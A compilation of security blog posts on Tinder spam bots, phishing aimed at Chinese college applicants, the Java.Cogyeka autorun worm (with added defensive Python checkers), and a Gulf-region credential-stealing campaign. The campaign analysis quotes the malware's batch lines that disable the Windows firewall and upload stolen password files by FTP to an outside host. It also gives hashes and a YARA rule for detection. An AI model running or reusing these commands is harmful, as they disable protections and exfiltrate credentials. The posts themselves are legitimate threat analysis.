Tinder: Spammers Flirt with Popular Mobile Dating App

Over the last few years, we’ve reported on a number of spam campaigns spreading through various social networking sites and applications. As with any social service, as it becomes popular, spammers look for ways to take advantage of this popularity by targeting the users of these services.

I’ve previously blogged about the popularity of online dating sites and highlighted an example of a malicious campaign using them as part of its lure. Today, one of the most popular online dating services is not a website, but a mobile application called Tinder.

Tinder is a mobile app that finds other users who like you nearby and connects you with them if you’re both interested. It is a very simple premise, which may explain why it has become one of the more popular dating services around. According to recent reports, Tinder users have been matched 50 million times and have provided 4.5 billion ratings on the service.

Recently, a number of users have reported that they have been finding spam accounts using the service.
 

Figure 1. Example of fake accounts on Tinder


Further research confirmed that a number of spam accounts have been created on Tinder.
 

Figure 2. Mutual Matches notification


Just as expected, when a user likes one of these spam accounts they’re instantly notified of the match. The spam accounts don’t seem to respond unless the user engages the account first.

The spam accounts follow a similar script when communicating with Tinder users.
 

Figure 3. Spam bot auto responses are the same


While engaging one of these spam accounts, I found a glitch.
 

Figure 4. Spam bot aged two years instantly


The spam bot seemed to report the wrong age twice, even though the spam account profile listed its age as 26.

Here is what the bot’s script typically looks like (glitch included):

Bot: hey … have we spoken before? 22..female here…you ?
Bot: hey ….. have we chatted before?? 24..female here…..u?
Bot: i’m sorry…I get to be forgetful at times! how’re u??
Bot: Just got online….long week been kind of busy! But I’m feelin’ aroused!! So what’s up …. Wanna have some fun ??  :)
Bot: I need a guy who can [REMOVED]..have u ever [REMOVED]?? hahaa
Bot: going to change my underwear….. want to see?? =)

At this point, the spam bot starts to lure the user in with the promise of a webcam session.
 

Figure 5. Spam bot begins the lure


From here, the spam bot provides a shortened URL and instructs the user on how to proceed in order to gain access to her webcam session.
 

Figure 6. Landing page used in Tinder spam


If the user accepts the invitation on the landing page, they are redirected to another site that asks them to sign up, requesting personal information as well as a credit card number, reportedly for age verification.
 

Figure 7. Membership requires credit card information


It’s interesting to note that the spam bot pre-emptively answers concerns about the website and the credit card information.
 

Figure 8. Spam bot responds to concerns


The bot glitches again, changing part of its script from “sexy” to “handsome” when checking whether the user has joined the site.
 

Figure 9. Spam bot glitch and request for “gold”


The spam bot also makes a request for some “gold” once the user joins the site. It’s likely that “gold” is a reference to currency used on the site, which a user may need to purchase.

How do the scammers monetize here? Affiliate programs are most often the drivers for much of the spam circulating on social networking sites. In this particular case, it’s best to “read the fine print,” as the old adage says.
 

Figure 10. Free access includes an upgrade to platinum membership


By default, the checkbox for “Upgrade me to a platinum membership” is selected. If this checkbox remains selected, the user is also signed up for two additional sites, which provide trial memberships of 10 days and 7 days respectively. If the user doesn’t cancel these accounts, they are then billed up to US$80 a month. Unfortunately, the user is often unaware that they are signing up for these additional sites, and the scammers are rewarded through the affiliate programs they signed up for.
 

Figure 11. Blocking spam accounts on Tinder


Currently, there is no way to report spam accounts within the Tinder application. However, the service does offer a way to block users. Therefore, users are advised to block any spam account they’ve been matched with.
 

Figure 12. Tinder for Android is on its way


The spam I’ve found on Tinder seems to be limited at this time. However, there is a concern that the service will see an influx of more spam bot accounts. While Tinder is only available for the iPhone at this time, there are plans to bring the application to Android devices. One trend I’ve observed in the last year is that following the introduction of an Android application, the volume of spam on popular services like these typically increases.

Phishers Target College Candidates in China

After the annual National College Entrance Examination (NCEE), Chinese high school graduates are now busy choosing a college and filling out college applications. The choice of college is no trivial matter; it determines matriculation.

Phishers also do not want to miss out on this event and the opportunity to profit. If a candidate’s personal information is stolen by phishers, the victim and their parents can expect to receive a large number of spam messages or annoying phone calls—including advertising from civil colleges and overseas educational agencies, or even attempts at financial fraud. Phishing websites may even make a candidate mistakenly think they have completed an application to a college when in fact they have not, which directly affects the candidate's future at this important juncture in their life. In addition, the candidate's information will be sold for profit to overseas educational agencies, fake credential makers, or re-application services.

Phishers may use the following tricks:

Clone an educational website
The fake Web page is almost identical to the real one, except that it includes embedded malicious script or fake university contact information. The links on the fake page mimic those of the real one. When a candidate searches for a university through a search engine, the link to a fake Web page may appear in the search results. If the candidate clicks any of its links, they may be led to a malicious phishing page.

Figure 1. Phishing site, "Beijing Economic Management Institute"

 

Figure 2. Legitimate site

Scam "smart" cards
This trick entices candidates to buy a "college entrance application smart card". This fake offer usually claims the smart card is used for completing the college entrance application forms. The smart card is promoted as also providing access to learning skills such as how to choose a college, or participation in a skills assessment along with helpful practice forms for the college application. However, real college applications can only be completed through the legitimate educational websites of the provinces, not any other way. These so-called "college entrance application smart cards" are just traps to fool people and obtain money from them.

Figure 3. "College entrance application smart card" scam

Fake enrollment guidance service
This kind of phishing website entices candidates to pay for a service. However, when the user actually pays, they will not get any guidance at all, just a loss of their money.

Figure 4. Fake enrollment guidance service

Alternative application process
Some websites may claim they can supply a "short cut" to admission for candidates who do not score highly in the college entrance exams. These websites display a notification asking users to submit their personal information for the application. If users fill out the form with their personal information, phishers will have stolen it for profit.

Figure 5. Fake "short cut" application for college admission

Most of the phishing websites use search engines, forums, or education advisory websites to promote these scams. We suggest candidates and their parents not click any suspicious URLs and be especially cautious during applications to college.

The Java Autorun Worm, Java.Cogyeka (1 of 3)

Java.Cogyeka
Recently there has been a lot of attention drawn to the vulnerabilities in Java and how they can lead to malware being created. However, it is worth noting that a vulnerability is not always required for malware to exist, as is the case with Java.Cogyeka. While this threat does not exploit any vulnerability in Java itself, it is written in the Java language and performs numerous malicious activities, which I intend to explore throughout this series of blogs.

Java.Cogyeka was discovered in July 2012 and is still active at the time of writing. This malware has five features, which I have broken down into the following categories:

  1. Propagation through autorun.inf
  2. Stealth techniques
  3. Downloader functionality
  4. Obfuscation
  5. Infostealer functionality

Other Java malware we have seen does not have this combination of malicious features. Typically, when we encounter Java in a malicious program, its only purpose is to download other malware, which then performs further malicious actions. However, Java.Cogyeka is a malicious program in its own right and with its own purpose—the Java code itself is being used to perform malicious activities without requiring an additional malicious module. This makes it the most comprehensive Java-only malware that I have ever come across.

This is the first in a series of three blogs on Java.Cogyeka and in this blog I will discuss the following features:

  • Propagation through an autorun.inf file
  • Stealth techniques
  • Downloader functionality

The remaining functions, Obfuscation and Infostealer functionality, will be discussed in future blogs.

Propagation through an autorun.inf file
As previously mentioned, this worm uses autorun.inf to spread and attempts to copy itself to a removable drive using a file name in the following format:

  • %DriveLetter%:\RECYCLER\[SID]\[RANDOM FILE NAME].[THREE RANDOM LETTERS FILE EXTENSION]

It then attempts to copy an autorun.inf file to the root folder of the removable drive in order to execute the worm whenever the removable drive is inserted into another computer.

Technically, a problem exists when creating the autorun.inf file on the removable drive. By design, Java operates within a sandbox and cannot interact directly with the resources of the operating system. Because of this, a Java application cannot directly determine the drive letter of a removable drive, but the Java Native Interface (JNI) offers a possible solution to this problem. The worm needs to know the drive letter of a removable drive in order to store and use the autorun.inf file effectively. To solve this problem, it calls the native Win32 API function GetDriveType through a Windows DLL that the malware author wrote specifically for this purpose; the Java code reaches this DLL through JNI. Symantec also detects the malicious DLL file as Java.Cogyeka.

Figure 1. Determining the name of the removable drive
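As an added defender-side example (not the worm's code and not taken from Symantec's write-up), the following Python check parses an autorun.inf and flags the two traits described above: a launch target under RECYCLER\[SID]\ with a three-letter extension, and an icon= entry borrowed from shell32.dll. The sample autorun.inf, its SID and its file name are constructed for the example.

```python
import re

# Constructed sample autorun.inf modelled on the article's description; not taken
# from a real Java.Cogyeka sample. The SID and the random file name are made up.
SAMPLE_AUTORUN = """[autorun]
open=RECYCLER\\S-1-5-21-1234567890-1234567890-1234567890-1000\\qzxv.hnm
icon=%SystemRoot%\\system32\\shell32.dll,3
action=Open folder to view files
"""

# RECYCLER\<SID>\<random name>.<three letters>, matched case-insensitively.
RECYCLER_PATH = re.compile(r"^recycler\\s-1-5-[0-9-]+\\[^\\]+\.[a-z]{3}$", re.IGNORECASE)


def parse_autorun(text):
    """Return the key=value pairs of the [autorun] section, keys lower-cased."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # skip blanks and comments
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_indicators(text):
    """List the Java.Cogyeka-style traits found in an autorun.inf: a launch
    target hidden under RECYCLER\\<SID> and a drive icon borrowed from shell32.dll."""
    entries = parse_autorun(text)
    findings = []
    # autorun.inf keys that can start a program when the drive is inserted or opened.
    for key in ("open", "shellexecute", "shell\\open\\command"):
        target = entries.get(key, "")
        if RECYCLER_PATH.match(target):
            findings.append("%s launches a file under RECYCLER\\<SID>: %s" % (key, target))
    icon = entries.get("icon", "")
    if "shell32.dll" in icon.lower():
        findings.append("drive icon taken from shell32.dll: " + icon)
    return findings


if __name__ == "__main__":
    for finding in autorun_indicators(SAMPLE_AUTORUN):
        print(finding)
```

Run against a mounted removable drive, the same function can be pointed at the autorun.inf in its root folder instead of the constructed sample.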

Stealth techniques
Java.Cogyeka uses certain stealth techniques when compromising a computer. It is doubtful that these techniques successfully trick users of the compromised computer or fool security products for that matter. The threat uses three stealth techniques.

Compromised removable drive icon
The removable drive that is compromised by this malware has its drive icon changed to a folder icon. Changing a drive icon is easy: the malware simply adds “icon=[PATH OF ICON IMAGE]” to the autorun.inf file. This malware uses the folder icon from the shell32.dll file.

Figure 2. Removable drive with changed icon

Changing the icon of an executable file is a well-known camouflage technique. If an executable file has a document file icon, like Microsoft Word or Adobe PDF, users may misidentify the executable file as a document file. However, changing the icon of a removable drive is a slightly different case. I do not know why the malware changes the icon of the removable drive, but this is one of the malware's meaningless stealth techniques. If found on the compromised computer, it can be seen as a sign that the malware may be present.

Repacked, not copied
Previously, I stated that the malware copies itself, but this is not entirely accurate. The malware actually repacks itself to the following location:

  • %Temp%\jar_cache[RANDOM DIGITS].tmp

The malware spreads itself as a JAR file. It may try to change the hash value of the JAR file by adding random bytes. The JAR format is a Zip archive used to pack Java classes into one file, and the malware adds the random bytes to an extra field in the Zip headers. However, most security vendors' virus scanners can extract Zip files to scan the files contained in the archive. They do this so that they can scan the malicious .class file within the JAR file and detect it even though the hash value of the JAR file has changed.

As a result, the malware's modification of the hash value of the JAR file is meaningless.
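To show why the hash change is meaningless, here is an added Python example (not Symantec's code and not taken from the malware): it builds a small JAR in memory, pads one entry's Zip extra field with random bytes under a constructed private tag (0xFFFF is an assumption, not the tag the worm uses), and demonstrates that the archive hash changes while the hash of the contained class does not. The class bytes are a constructed stand-in, not a real compiled class.

```python
import hashlib
import io
import os
import struct
import zipfile

# Constructed stand-in for a compiled class (a real .class file starts with CAFEBABE).
SAMPLE_CLASS = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"constructed class body"
FIXED_TIME = (2012, 7, 1, 0, 0, 0)   # constant timestamp keeps the clean archive deterministic
PADDING_TAG = 0xFFFF                 # assumed private extra-field tag used to carry the padding
# Extra-field tags ordinary packers emit (Zip64, NTFS time, extended time, Unix uid/gid).
KNOWN_TAGS = {0x0001, 0x000A, 0x5455, 0x7875}


def build_jar(class_bytes, pad_len=0):
    """Build an in-memory JAR; pad_len > 0 adds a well-formed extra field of random bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        info = zipfile.ZipInfo("Main.class", date_time=FIXED_TIME)
        info.compress_type = zipfile.ZIP_DEFLATED
        if pad_len:
            # Extra field = 2-byte tag, 2-byte length, payload; the payload is random.
            info.extra = struct.pack("<HH", PADDING_TAG, pad_len) + os.urandom(pad_len)
        zf.writestr(info, class_bytes)
    return buf.getvalue()


def inspect_jar(jar_bytes):
    """Return the archive hash plus, per member, its content hash and extra-field tags."""
    members = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            tags, extra = [], info.extra
            while len(extra) >= 4:        # walk the tag/length records of the extra field
                tag, ln = struct.unpack("<HH", extra[:4])
                tags.append(tag)
                extra = extra[4 + ln:]
            members[info.filename] = {
                "sha256": hashlib.sha256(zf.read(info)).hexdigest(),
                "extra_tags": tags,
            }
    return {"jar_sha256": hashlib.sha256(jar_bytes).hexdigest(), "members": members}


def suspicious_extra_tags(report):
    """Return (member, tag) pairs whose extra-field tag no normal build tool would write."""
    return [(name, tag) for name, m in report["members"].items()
            for tag in m["extra_tags"] if tag not in KNOWN_TAGS]


if __name__ == "__main__":
    clean, padded = inspect_jar(build_jar(SAMPLE_CLASS)), inspect_jar(build_jar(SAMPLE_CLASS, 32))
    print("archive hashes differ:", clean["jar_sha256"] != padded["jar_sha256"])
    print("class hashes equal:   ", clean["members"]["Main.class"]["sha256"]
          == padded["members"]["Main.class"]["sha256"])
    print("odd extra tags:       ", suspicious_extra_tags(padded))
```

A scanner that hashes the extracted Main.class, as the text describes, therefore sees the same value for both archives.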

java.exe instead of a system process
The malware copies java.exe to the following location:

  •  %Temp%\hsperfdata_[USER NAME]\[SYSTEM EXECUTABLE FILE NAME].exe

It uses one of the following system executable file names:

  • csrss
  • explorer
  • lsass
  • services
  • smss
  • svchost
  • winlogon

Users, even if they have administrator privileges, cannot end these processes, except for the explorer.exe process. The malware aims to deter users from ending the process in which the worm is running. However, it uses “javaw” in the StubPath registry subkey, as described in our detection write-up, instead of "[SYSTEM FILE NAME].exe", with "SYSTEM FILE NAME" representing one of the process names listed above. Users who find this malware running as a system process cannot manually end the malware process by using Windows Task Manager. Third-party software, however, can be used to end the process. It is also worth noting that Symantec Endpoint Protection and Norton Internet Security/Norton 360 products will end this process automatically as soon as it starts.

While the malware author makes it inconvenient for users to end this process manually, the technique used is far from successful.

Downloader functionality
After the malware compromises a computer, it attempts to connect to a server in order to download an additional module. Apparently, this module is a JAR file. The malware downloads it, extracts the class files into its memory space and then loads them with the Java ClassLoader class. Because it can load arbitrary classes this way, the malware author can gain control of the compromised computer. The malware can also download updates with new features for itself or other modules.

To be continued…
This blog is an overview of Java.Cogyeka and how it works to compromise computers. The next blog in the series will discuss obfuscation techniques used by the worm as well as its main module.

Targeted Campaign Steals Credentials in Gulf States and Caribbean

Last week, McAfee’s Foundstone Incident Response team got hold of a piece of malware that was sent out during a phishing campaign. The campaign targeted several companies and institutes in the United Arab Emirates, Oman, Bahrain, and a couple of Caribbean islands.

The executable that was sent with the email was called emiratesstatement.exe, and its icon was chosen to make the executable look like a PDF.

  • File: emiratestatement.exe
  • Size: 3,325,952 bytes
  • MD5:  0E37B6EFE5DE1CC9236017E003B1FC37

A sample of more than 3MB is strange; malware samples are normally less than 1MB. Analyzing the malware, we retrieved a simple XOR key that decrypts the contents of this file.

Figure: XOR decryption of the file contents.

While running this malware through behavioral analysis we extracted more than 14 files from this executable:

aatd.bat 48d6afe2dcb0a98819c1c76cd3cd054d
bms.klm 3268e2c9998a27902151b19eb5a0d8f4
cond.reg 631729880e3feedc0454cddc5014ef7d
dd.vbs cdc8adfcdf51b0e91b56c85f4a5f041d
icd.bat 9e3ff6bf3ac3d989db6e306710bab1b8
ictd.bat 4d7f254f7046e151dde6618d5561d31d
ied.bat f7cb74f59c4f55005f26e43dd146209a
iewed.bat 1af2ab442e95630ee768a2b83868fd60
image.exe a28b22acf2358e6aced43a6260af9170
keeprun.ini 07ec8b360e188bbcf2013a5e3a220e5d
msnd.exe 6f506d7adfcc2288631ed2da37b0db04
picture viewer.exe 8aebade47dc1aa9ac4b5625acf5ade8f
pid.PDF 3bb044c0480af11e5bf466f9f253e2a9
sad.vbs 12a5bdd999d105691555e72100d9b4e9

 

Each of them played a role in the execution chain. The key components:

  • Msnd.exe: a keylogger writing the output to a TMP file
  • Image.exe: mail password recovery tool written by SecurityXploded
  • Picture viewer.exe: browser password recovery tool written by SecurityXploded

The malware tries two options to install itself:

  • Installing the msnd keylogger and activating the password recovery tools
  • Opening the pid.PDF file. This PDF will open a PDF reader and the malware will inject itself into this process and activate the password-recovery tools.

During the malware’s installation, it disables the Windows firewall by using two simple .bat scripts containing the following code:

@netsh firewall set opmode disable
@cls
@netsh advfirewall set currentprofile state off

After gathering all the recovered passwords and writing them to output files, these files are converted to files starting with the prefix PIC- followed by the date/time and a numerical indicator:

@set d=%date:~-4,4%%date:~-7,2%%date:~0,2%
@set d=%d: =_%
@set t=%time:~0,2%%time:~3,2%%time:~6,2%
@set t=%t: =0%
@RENAME "msn.klm" "PIC_%d%_%t%.014"
@cls
@RENAME "wmsn.klm" "PIC_%d%_%t%.015"

After these files are created, an FTP session transfers the files to this FTP server:

@start /b ftp -i -v -s:bms.klm ftp.freehostia.com

Figure: the malware and its relations with the different modules.

The FTP site contained several folders with the PIC*.* files.

Figure: FTP folder listing containing the PIC files.

By analyzing the output files, we found the targets of this campaign were situated in the United Arab Emirates, Bahrain, Oman, and a couple of Caribbean islands. The victims ranged from local government entities to companies operating in the telecom sector, IT, travel, and natural resources. The credentials the criminals acquired contained usernames and passwords for a variety of sites:

  • Webmail of the victim’s institute/company
  • Facebook
  • Hotmail
  • Internal CRM system
  • News-site logins
  • Travel reservation systems
  • E-services for governmental institutes
  • Firewall logins
  • Tender site logins

YARA rule to detect the malware:

rule EmiratesStatement
{
    meta:
        author = "Christiaan Beek"
        date = "2013-06-30"
        description = "Credentials Stealing Attack"
        hash0 = "0e37b6efe5de1cc9236017e003b1fc37"
        hash1 = "a28b22acf2358e6aced43a6260af9170"
        hash2 = "6f506d7adfcc2288631ed2da37b0db04"
        hash3 = "8aebade47dc1aa9ac4b5625acf5ade8f"

    strings:
        $string0 = "msn.klm"
        $string1 = "wmsn.klm"
        $string2 = "bms.klm"

    condition:
        all of them
}

To prevent these kinds of attacks:

  • Users should not click on files attached to an email that are sent by unknown persons
  • Block emails at the email gateway/mail server that contain an executable file
  • Implement a spam filter that regularly imports up-to-date threat intelligence